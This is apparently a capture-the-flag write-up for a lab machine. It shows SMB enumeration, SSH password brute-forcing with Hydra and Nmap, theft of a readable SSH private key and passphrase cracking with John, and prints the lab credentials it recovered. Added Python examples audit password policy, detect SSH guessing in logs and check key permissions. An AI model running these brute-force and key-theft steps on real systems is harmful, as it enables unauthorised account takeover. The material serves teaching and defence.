User brute-forcing to find the username & password
Running Enum4Linux - To enumerate SMB
enum4linux -a 10.10.21.87
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Mar 9 22:26:17 2021
==========================
| Target Information |
==========================
Target ........... 10.10.21.87
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===================================================
| Enumerating Workgroup/Domain on 10.10.21.87 |
===================================================
[+] Got domain/workgroup name: WORKGROUP
===========================================
| Nbtstat Information for 10.10.21.87 |
===========================================
Looking up status of 10.10.21.87
BASIC2 <00> - B <ACTIVE> Workstation Service
BASIC2 <03> - B <ACTIVE> Messenger Service
BASIC2 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
====================================
| Session Check on 10.10.21.87 |
====================================
[+] Server 10.10.21.87 allows sessions using username '', password ''
==========================================
| Getting domain SID for 10.10.21.87 |
==========================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Cant determine if host is part of domain or part of a workgroup
=====================================
| OS information on 10.10.21.87 |
=====================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.21.87 from smbclient:
[+] Got OS info for 10.10.21.87 from srvinfo:
BASIC2 Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
platform_id : 500
os version : 6.1
server type : 0x809a03
============================
| Users on 10.10.21.87 |
============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.
========================================
| Share Enumeration on 10.10.21.87 |
========================================
Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.10.21.87
//10.10.21.87/Anonymous Mapping: OK, Listing: OK
//10.10.21.87/IPC$ [E] Cant understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
===================================================
| Password Policy Information for 10.10.21.87 |
===================================================
[+] Attaching to 10.10.21.87 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] BASIC2
[+] Builtin
[+] Password Info for Domain: BASIC2
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
=============================
| Groups on 10.10.21.87 |
=============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
======================================================================
| Users on 10.10.21.87 via RID cycling (RIDS: 500-550,1000-1050) |
======================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2853212168-2008227510-3551253869
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-500 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-502 *unknown*\*unknown* (8)
..
S-1-5-21-2853212168-2008227510-3551253869-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
..
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
..
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
============================================
| Getting printer info for 10.10.21.87 |
============================================
No printers returned.
We find two usernames: jan and kay.
Now we'll try to brute-force jan's password, because in the /development directory we found a text file in which K (kay) mentioned that J's (jan's) password was easily crackable.
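To turn a saved enum4linux run like the one above into something a defender can act on, here is an added example (not part of the original write-up and not from enum4linux) that parses two things from the output: the accounts a null session could enumerate via RID cycling, and the password-policy values, which it checks against thresholds that are this example's own choices (minimum length 12, a non-zero lockout threshold, complexity on, history kept). The embedded sample is a constructed excerpt using the values shown in the run above.

```python
"""Audit helper for enum4linux output. Added example for this write-up; it
is not part of enum4linux or of the original post. Thresholds below are
this example's own choices, not values from the target."""
import re

# Constructed excerpt, using the values the write-up's enum4linux run shows.
SAMPLE_OUTPUT = r"""
[+] Server 10.10.21.87 allows sessions using username '', password ''
[+] Minimum password length: 5
[+] Password history length: None
[+] Password Complexity Flags: 000000
[+] Account Lockout Threshold: None
[+] Locked Account Duration: 30 minutes
S-1-5-21-2853212168-2008227510-3551253869-500 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
""".strip()

MIN_LENGTH = 12  # example threshold; the target's policy allows 5

# "<SID>-<RID> <domain>\<name> (<kind>)"; unresolved "*unknown*" rows do not match
RID_LINE = re.compile(
    r"^(?P<base>S-1-[\d-]+)-(?P<rid>\d+)\s+(?P<domain>[^\\]+)\\(?P<name>.+?)"
    r"\s+\((?P<kind>Local User|Local Group|Domain User|Domain Group)\)\s*$"
)
POLICY_LINE = re.compile(r"^\[\+\]\s+([^:]+):\s*(.*?)\s*$")
NULL_SESSION = re.compile(r"allows sessions using username '', password ''")


def parse_accounts(text):
    """Accounts resolved by RID cycling, in the order they appear."""
    accounts = []
    for line in text.splitlines():
        m = RID_LINE.match(line.strip())
        if m:
            accounts.append({"name": m["name"], "domain": m["domain"],
                             "kind": m["kind"], "sid": f"{m['base']}-{m['rid']}"})
    return accounts


def parse_policy(text):
    """'[+] Key: value' lines as a dict (values kept as the strings printed)."""
    policy = {}
    for line in text.splitlines():
        m = POLICY_LINE.match(line.strip())
        if m:
            policy[m.group(1).strip()] = m.group(2)
    return policy


def _count(value):
    """Numeric policy value, or 0 for 'None'/missing."""
    return int(value) if value is not None and value.isdigit() else 0


def audit(text):
    """Return accounts, the parsed policy and a list of findings."""
    policy = parse_policy(text)
    findings = []
    if NULL_SESSION.search(text):
        findings.append("null SMB session accepted: users and policy readable without credentials")
    if _count(policy.get("Minimum password length")) < MIN_LENGTH:
        findings.append(f"minimum password length {policy.get('Minimum password length')} is below {MIN_LENGTH}")
    if _count(policy.get("Account Lockout Threshold")) == 0:
        findings.append("no account lockout threshold: online password guessing is never throttled")
    flags = policy.get("Password Complexity Flags")
    if flags is not None and flags.strip("0") == "":
        findings.append("password complexity disabled")
    if _count(policy.get("Password history length")) == 0:
        findings.append("no password history: old passwords can be reused")
    return {"accounts": parse_accounts(text), "policy": policy, "findings": findings}


if __name__ == "__main__":
    result = audit(SAMPLE_OUTPUT)
    for acct in result["accounts"]:
        print(f"{acct['kind']:12} {acct['domain']}\\{acct['name']}  ({acct['sid']})")
    for finding in result["findings"]:
        print("[!]", finding)
```

Run against a real capture with `audit(open("enum4linux.out").read())`. The two findings that matter most for what follows are the missing lockout threshold and the five-character minimum: together they are why an online guessing run against SSH can keep going for hours without ever locking the account.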
HYDRA:
Using Hydra to bruteforce the username and password
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.21.87 -t 4 | tee hydra.out
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-09 22:14:13
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://10.10.21.87:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 14344355 to do in 5433:29h, 4 active
[STATUS] 28.00 tries/min, 84 tries in 00:03h, 14344315 to do in 8538:17h, 4 active
[STATUS] 29.14 tries/min, 204 tries in 00:07h, 14344195 to do in 8203:23h, 4 active
[STATUS] 28.07 tries/min, 421 tries in 00:15h, 14343978 to do in 8517:49h, 4 active
[22][ssh] host: 10.10.21.87 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-09 22:43:05
The Nmap NSE ssh-brute script was faster than Hydra here.
nmap 10.10.21.87 -p 22 --script ssh-brute --script-args userdb=user.txt,passdb=/usr/share/wordlists/rockyou.txt | tee ssh-brute.out
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 22:22 IST
NSE: [ssh-brute] Trying username/password pair: jan:jan
..
Nmap scan report for 10.10.21.87
Host is up (0.17s latency).
PORT STATE SERVICE
22/tcp open ssh
| ssh-brute:
| Accounts:
| jan:armando - Valid credentials
|_ Statistics: Performed 781 guesses in 636 seconds, average tps: 1.7
Nmap done: 1 IP address (1 host up) scanned in 665.56 seconds
You can also use msfconsole to brute-force the credentials.
We found jan's password: armando.
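Both brute-force runs above leave a very recognisable trail on the server: hundreds of "Failed password" entries for one user from one source, at a steady rate, followed by a single "Accepted password" from the same source. The following added example (not from Hydra, Nmap or the original write-up) shows the detection side: a sliding-window counter over sshd auth.log lines that raises one alert per source once it reaches a threshold of failures inside a window, and marks the alert when that source later logs in successfully. The threshold (10 failures in 5 minutes), the assumed log year, and the sample lines are constructed for the example; the host name is the write-up's.

```python
"""SSH password-guessing detector over auth.log lines. Added example for
this write-up (not from Hydra, Nmap or the original post). Threshold,
window and the log year are this example's assumptions."""
from collections import defaultdict, deque, namedtuple
from datetime import datetime, timedelta
import re

THRESHOLD = 10                 # failures per source that trigger an alert
WINDOW = timedelta(minutes=5)  # sliding window for counting failures
LOG_YEAR = 2021                # syslog lines carry no year; assumed here

Event = namedtuple("Event", "ts outcome user source")

# e.g. "Mar  9 22:14:13 basic2 sshd[1201]: Failed password for jan from 10.10.14.3 port 51022 ssh2"
SSHD_LINE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2})\s+(?P<time>\d\d:\d\d:\d\d)\s+\S+\s+sshd\[\d+\]:\s+"
    r"(?P<outcome>Failed|Accepted) (?:password|publickey) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<source>\S+) port \d+"
)


def parse_events(lines):
    """Yield Event tuples for sshd login outcomes; other lines are ignored."""
    for line in lines:
        m = SSHD_LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{m['mon']} {m['day']} {m['time']} {LOG_YEAR}", "%b %d %H:%M:%S %Y")
        yield Event(ts, m["outcome"], m["user"], m["source"])


def detect(lines, threshold=THRESHOLD, window=WINDOW):
    """Return alerts as dicts: source, user, failures, first, last, succeeded."""
    recent = defaultdict(deque)  # source -> timestamps of failures inside window
    alerts = {}
    for ev in parse_events(lines):
        if ev.outcome == "Failed":
            q = recent[ev.source]
            q.append(ev.ts)
            while ev.ts - q[0] > window:   # drop failures older than the window
                q.popleft()
            if ev.source in alerts:
                alerts[ev.source]["failures"] += 1
                alerts[ev.source]["last"] = ev.ts
            elif len(q) >= threshold:
                alerts[ev.source] = {"source": ev.source, "user": ev.user, "failures": len(q),
                                     "first": q[0], "last": ev.ts, "succeeded": False}
        elif ev.source in alerts:
            # A success after a burst of failures: the guessing worked.
            alerts[ev.source]["succeeded"] = True
    return list(alerts.values())


def _syslog_ts(t):
    """Syslog-style timestamp, day padded with a space as sshd logs it."""
    return f"{t:%b} {t.day:2d} {t:%H:%M:%S}"


def build_sample_log():
    """Constructed auth.log excerpt: 10.10.14.3 guesses jan's password every
    2 seconds (close to the ~28 tries/min the Hydra run reported), one
    unrelated failure from 10.10.14.9, then a successful login from 10.10.14.3."""
    start = datetime(LOG_YEAR, 3, 9, 22, 14, 13)
    lines = [f"{_syslog_ts(start + timedelta(seconds=2 * i))} basic2 sshd[{1200 + i}]: "
             f"Failed password for jan from 10.10.14.3 port {51000 + i} ssh2" for i in range(30)]
    lines.insert(5, f"{_syslog_ts(start + timedelta(seconds=9))} basic2 sshd[1301]: "
                    "Failed password for kay from 10.10.14.9 port 40412 ssh2")
    lines.append(f"{_syslog_ts(start + timedelta(seconds=61))} basic2 sshd[1400]: "
                 "Accepted password for jan from 10.10.14.3 port 51999 ssh2")
    return lines


if __name__ == "__main__":
    for a in detect(build_sample_log()):
        print(f"{a['source']}: {a['failures']} failures for {a['user']} between "
              f"{a['first']:%H:%M:%S} and {a['last']:%H:%M:%S}; succeeded={a['succeeded']}")
```

On a real host feed it `detect(open("/var/log/auth.log"))`. The "succeeded" flag is the one to page on: a burst of failures is noise, a burst followed by an accepted login from the same address is an account that has just been taken over. The same policy gap the enum4linux output exposed (no lockout threshold) is what lets the burst run long enough to be this obvious.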
What is the username?
Answer: jan
What is the password?
Answer: armando
What service do you use to access the server (answer in abbreviation in all caps)?
Answer: SSH
Enumerate the machine to find any vectors for privilege escalation
There is a password backup file, pass.bak, in kay's home directory, but jan has no read permission on it.
So we run linpeas.sh to look for possible privilege escalation vectors.
Download linpeas.sh with wget into any directory where you have write permission.
jan@basic2:$ ./linpeas.sh
...
[+] Searching ssl/ssh files
Port 22
PermitRootLogin prohibit-password
PubkeyAuthentication yes
PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes
Possible private SSH keys were found!
/home/kay/.ssh/id_rsa
--> /etc/hosts.allow file found, read the rules:
/etc/hosts.allow
...
jan@basic2:/home/kay/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
.
.
.
-----END RSA PRIVATE KEY-----
From the linpeas output we see that kay's SSH private key (/home/kay/.ssh/id_rsa) is readable by our user.
Copy the contents of the id_rsa file (the private key) and save it on your local machine.
Try to log in using the private key.
The -i flag tells ssh which identity file (private key) to use.
root@kali: ssh -i kay_id_rsa kay@10.10.21.87
Enter passphrase for key 'kay_id_rsa':
It asks for a passphrase, which we don't have yet.
What is the name of the other user you found(all lower case)?
Answer: kay
If you have found another user, what can you do with this information?
Answer: We can try to escalate our privileges to gain root access. Maybe that user can have additional permissions which can be exploited to gain root access.
Now we'll try to brute-force the SSH key passphrase using John the Ripper.
First convert the id_rsa file with ssh2john.py into a hash format that John can load.
root@kali: /usr/share/john/ssh2john.py kay_id_rsa > forjohn.txt
root@kali: john forjohn.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax (kay_id_rsa)
Session completed
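Two things made this key usable: the file was readable by another user, and its passphrase wrapper is the legacy PEM format, whose key derivation is a single MD5 pass (that is what John's "Cost 1 ... is 0" and "iteration count is 1" lines mean), so a wordlist runs through it almost instantly. The following added example (not from linpeas, John or the original write-up) is the audit a defender would run to catch both: it walks a directory tree, identifies private-key files, reports any readable by group or others, and distinguishes unencrypted keys, legacy PEM-encrypted keys, and OpenSSH-format keys whose bcrypt round count it reads from the key header. The sample tree it builds is constructed: the PEM headers copy the id_rsa headers shown above, the key bodies are filler rather than real keys, and the 16-round minimum is this example's threshold.

```python
"""Private-key hygiene audit. Added example for this write-up (not from
linpeas, John or the original post). Sample files are constructed."""
import base64
import os
import re
import stat
import struct
import tempfile

MIN_BCRYPT_ROUNDS = 16  # example threshold; ssh-keygen's default for -a is 16
KEY_BEGIN = re.compile(r"-----BEGIN (.+?) PRIVATE KEY-----")
OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _ssh_string(buf, off):
    """Read one length-prefixed SSH string; returns (bytes, next offset)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def inspect_key(text):
    """Describe a key's protection: format, encrypted, kdf (and rounds)."""
    m = KEY_BEGIN.search(text)
    if not m:
        return None
    if m.group(1) == "OPENSSH":
        body = "".join(l for l in text.splitlines() if not l.startswith("-----"))
        raw = base64.b64decode(body)
        if not raw.startswith(OPENSSH_MAGIC):
            return {"format": "openssh", "encrypted": None, "kdf": "unparseable"}
        cipher, off = _ssh_string(raw, len(OPENSSH_MAGIC))
        kdf, off = _ssh_string(raw, off)
        opts, _ = _ssh_string(raw, off)
        info = {"format": "openssh", "encrypted": cipher != b"none", "kdf": kdf.decode()}
        if kdf == b"bcrypt":  # kdfoptions = string salt, uint32 rounds
            _salt, o = _ssh_string(opts, 0)
            (info["rounds"],) = struct.unpack(">I", opts[o:o + 4])
        return info
    # Legacy PEM: "Proc-Type: 4,ENCRYPTED" + "DEK-Info" headers mean a
    # passphrase is set, but the cipher key is derived with one MD5 round.
    encrypted = "Proc-Type: 4,ENCRYPTED" in text
    dek = re.search(r"DEK-Info: ([^,]+),", text)
    return {"format": "pem", "encrypted": encrypted,
            "kdf": "md5-1-round" if encrypted else "none",
            "cipher": dek.group(1) if dek else None}


def audit_keys(root):
    """Every private key under root with its mode, protection and issues."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, errors="replace") as f:
                    info = inspect_key(f.read())
            except OSError:
                continue
            if info is None:
                continue
            mode = stat.S_IMODE(os.stat(path).st_mode)
            issues = []
            if mode & (stat.S_IRGRP | stat.S_IROTH):
                issues.append(f"readable by group/others (mode {mode:04o})")
            if info["encrypted"] is False:
                issues.append("no passphrase")
            elif info["format"] == "pem":
                issues.append("legacy PEM encryption: one MD5 round, cheap to guess offline")
            elif info["kdf"] == "bcrypt" and info["rounds"] < MIN_BCRYPT_ROUNDS:
                issues.append(f"bcrypt rounds {info['rounds']} below {MIN_BCRYPT_ROUNDS}")
            findings.append({"path": os.path.relpath(path, root), "mode": mode, **info, "issues": issues})
    return findings


def build_sample_tree():
    """Throwaway tree with three constructed key files: kay's legacy key
    (headers as in the write-up, world-readable), an unencrypted key, and an
    OpenSSH-format key with bcrypt at 16 rounds. Bodies are filler bytes."""
    root = tempfile.mkdtemp(prefix="keyaudit-")
    filler = base64.b64encode(b"\x00" * 48).decode()
    legacy = ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
              "DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75\n\n"
              f"{filler}\n-----END RSA PRIVATE KEY-----\n")
    plain = f"-----BEGIN RSA PRIVATE KEY-----\n{filler}\n-----END RSA PRIVATE KEY-----\n"
    s = lambda b: struct.pack(">I", len(b)) + b      # SSH string encoder
    opts = s(b"\x11" * 16) + struct.pack(">I", 16)    # salt, rounds
    blob = OPENSSH_MAGIC + s(b"aes256-ctr") + s(b"bcrypt") + s(opts)
    modern = ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
              f"{base64.b64encode(blob).decode()}\n-----END OPENSSH PRIVATE KEY-----\n")
    for rel, content, mode in [("kay/.ssh/id_rsa", legacy, 0o644),
                               ("jan/.ssh/id_rsa", plain, 0o600),
                               ("ops/.ssh/id_ed25519", modern, 0o600)]:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as f:
            f.write(content)
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    for finding in audit_keys(build_sample_tree()):
        print(f"{finding['path']:22} {finding['mode']:04o} {finding['kdf']:13} "
              + ("; ".join(finding["issues"]) or "ok"))
```

Run it as `audit_keys("/home")` on a host to get the real report. The fix for a flagged legacy key is to re-wrap it in the OpenSSH format with a bcrypt KDF (`ssh-keygen -p -o -a 100 -f id_rsa`) and restore mode 0600; the passphrase itself still has to be one a wordlist will not contain.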
Log in using the SSH private key and provide the passphrase.
root@kali: ssh -i kay_id_rsa kay@10.10.21.87
Enter passphrase for key 'kay_id_rsa':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
References
The private key (id_rsa) can also be obtained in other scenarios, for example when an LFI vulnerability gives us read access to the file, or when command injection lets us execute commands that read it.